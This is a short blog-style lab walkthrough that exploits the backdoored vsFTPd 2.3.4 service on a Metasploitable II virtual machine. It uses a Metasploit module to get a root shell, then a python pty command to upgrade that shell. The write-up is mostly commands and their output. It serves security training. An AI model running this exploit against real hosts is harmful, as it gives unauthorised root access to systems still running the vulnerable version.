In Metasploitable II There is a vulnerable FTP Installation on the remote host. Our goal is to exploit the vulnerabity and gain local access to the remote machine.
sam@ubuntu:~/metasploit-framework$ ftp 192.168.56.101 Connected to 192.168.56.101. 220 (vsFTPd 2.3.4) Name (192.168.56.101:sam): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp>
We see that the version of the ftpd is 2.3.4. We know that there is a module in metasploit for the service version of the ftp.
Lets first fire up metasploit and choose our module which we will exploit the FTP service.
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 21 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic
Now all thats left to do is set the RHOSTS option and run the exploit on the remote host.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.56.101:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.56.101:21 - USER: 331 Please specify the password.
[+] 192.168.56.101:21 - Backdoor service has been spawned, handling...
[+] 192.168.56.101:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.56.1:35155 -> 192.168.56.101:6200) at 2020-02-07 06:18:49 -0700
id
uid=0(root) gid=0(root)
whoami
root
python -c 'import pty; pty.spawn("/bin/bash")'
root@metasploitable:/#
As you can see we got a root shell on the remote host.
No comments:
Post a Comment